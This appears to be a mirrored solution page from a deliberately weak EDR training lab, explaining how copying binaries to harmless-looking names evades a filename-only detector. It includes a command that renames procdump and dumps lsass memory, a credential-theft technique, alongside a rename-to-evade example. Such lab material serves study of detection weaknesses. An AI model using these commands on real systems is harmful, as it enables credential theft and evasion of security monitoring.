mirror of
https://github.com/BenjiTrapp/MostShittyEDR
synced 2026-08-09 12:00:52 +00:00
Jekyll collections require the underscore-prefixed directory naming convention (_challenges, _solutions). Move files accordingly, extract index pages to root with proper permalinks, and fix defaults scope in _config.yml to use type-based matching. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
864 B
864 B
title, difficulty, category
| title | difficulty | category |
|---|---|---|
| Solution 03: Copy and Rename | easy | Process Name Evasion |
[Back to Challenge]({{ '/challenges/03-copy-and-rename/' | relative_url }})
Overview
Since the EDR has no hash-based detection, copying a binary to any non-blacklisted name works.
Solution
# Copy to an innocent-looking name
copy C:\Windows\notepad.exe C:\Temp\TextEditor.exe
.\TextEditor.exe
# Copy procdump with a system-sounding name
copy procdump.exe svcdiag.exe
.\svcdiag.exe -ma lsass.exe
Why It Works
The EDR identifies processes solely by their executable filename. It has:
- No file hash checking (Rule 6 database is empty)
- No digital signature verification
- No file metadata analysis
- No YARA rule scanning
A binary's behavior is identical regardless of its filename. The copy is functionally the same as the original.